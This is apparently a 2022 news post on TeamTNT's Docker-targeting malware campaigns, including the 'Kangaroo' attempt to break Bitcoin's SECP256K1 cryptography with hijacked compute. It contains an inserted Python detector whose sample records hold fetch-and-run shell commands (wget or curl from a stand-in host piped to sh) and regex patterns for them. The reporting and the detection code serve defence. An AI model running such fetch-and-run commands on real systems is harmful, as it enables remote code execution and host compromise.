Tuesday, September 20, 2022

TeamTNT Deploys Kangaroo Malware Attack On Bitcoin Aimed At Breaking Encryption


Researchers at Aqua Security have discovered cyberattacks that appear to have been carried out by TeamTNT, a threat actor previously considered defunct. The researchers encountered three different attacks, each of which appears to be new. One of these attacks, which the researchers have dubbed the “Kangaroo attack,” is notable for leveraging distributed computing power in an attempt to break the encryption that underlies Bitcoin.

TeamTNT was a threat actor highly skilled at compromising cloud environments. Its attacks made use of never-before-seen techniques and exploits, as TeamTNT developed its own toolbox rather than relying on the same methods used by many other threat actors. After operating in this manner for almost two years, TeamTNT called it quits in November 2021. The threat actor subsequently ceased to develop and deploy new malware. That said, the threat actor did not take down its infrastructure, leaving its extant malware to continue its spread.

Now, almost a year after TeamTNT announced its retirement, three new malware campaigns point to TeamTNT as the originator. Two of these attacks, the Kangaroo attack and the What Will Be attack, target misconfigured Docker daemons and install Alpine Linux container images that download and run malicious shell scripts. The script run in the What Will Be attack exploits a vulnerability to escape the container image and compromise the host. Further shell scripts then schedule cron jobs and install rootkits and cryptominers. The third attack, dubbed Cronb, is not completely new, but uses new C2 server addresses compared to previous attacks. It is used for lateral movement across a network, for persistence, and to install rootkits and cryptominers, like What Will Be.
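As a defender-side illustration of the pattern described above (an Alpine container whose command downloads and runs a shell script), the following added example, which is not from Aqua Security or the original article, applies simple heuristics to `docker inspect` style records. The sample records, addresses and finding names are constructed, and the privileged and host-root-mount checks are an assumption about common container-escape preconditions, not details reported in the article.

```python
import re

# Heuristics for one container's `docker inspect` record (parsed into a dict).
FETCH = re.compile(r"\b(?:curl|wget)\b[^|;&]*https?://", re.I)
PIPE_SHELL = re.compile(r"\|\s*(?:/bin/)?(?:ba|a)?sh\b")
RUN_AFTER = re.compile(r"(?:;|&&)\s*(?:(?:/bin/)?(?:ba|a)?sh\s+\S+|chmod\s+\+x\b)")

def is_alpine(image):
    # "alpine", "alpine:3.16" and "docker.io/library/alpine@sha256:..." all count.
    name = image.lower().split("/")[-1]
    return name.split("@")[0].split(":")[0] == "alpine"

def findings(inspect):
    """Return a list of finding names (hypothetical labels) for one container."""
    cfg = inspect.get("Config") or {}
    host = inspect.get("HostConfig") or {}
    cmd = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
    out = []
    # A remote fetch that is piped to a shell, or followed by running the file.
    if FETCH.search(cmd) and (PIPE_SHELL.search(cmd) or RUN_AFTER.search(cmd)):
        out.append("alpine-download-and-run" if is_alpine(cfg.get("Image") or "")
                   else "download-and-run")
    # Assumption, not from the article: settings that make host compromise easier.
    if host.get("Privileged"):
        out.append("privileged")
    if any(b.split(":")[0] == "/" for b in host.get("Binds") or []):
        out.append("host-root-mount")
    return out

# Constructed sample records; 203.0.113.0/24 is a documentation address range.
SAMPLES = {
    "suspect": {
        "Config": {"Image": "alpine:latest", "Entrypoint": None,
                   "Cmd": ["sh", "-c", "wget -qO- http://203.0.113.10/constructed.sh | sh"]},
        "HostConfig": {"Privileged": False, "Binds": ["/:/mnt"]}},
    "fetch_then_run": {
        "Config": {"Image": "ubuntu:22.04",
                   "Cmd": ["sh", "-c", "curl -o /tmp/x http://203.0.113.10/x; sh /tmp/x"]},
        "HostConfig": {}},
    "healthcheck": {
        "Config": {"Image": "alpine:3.16",
                   "Cmd": ["sh", "-c", "apk add --no-cache curl && curl -fsS https://example.com/health"]},
        "HostConfig": {"Binds": ["/srv/data:/data:ro"]}},
}

if __name__ == "__main__":
    for name, record in SAMPLES.items():
        print(name, findings(record))
```
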

However, while the two other attacks infect victims’ systems to mine cryptocurrency, the Kangaroo attack does something of the opposite. It leverages infected environments to run a solver algorithm meant to break the SECP256K1 encryption that underlies Bitcoin. Breaking this encryption with today’s computers is considered to be a virtually impossible task, but the Kangaroo attack is tasking compromised environments with doing so anyway. The solver algorithm splits the job up into smaller tasks, enabling TeamTNT to potentially leverage a large amount of stolen computing power simultaneously by distributing different chunks to each system compromised by the attack. Even so, breaking Bitcoin’s encryption in this way is still highly unlikely, making this particular attack seem somewhat strange. It is not clear what the motive or intention is behind this particular attack.
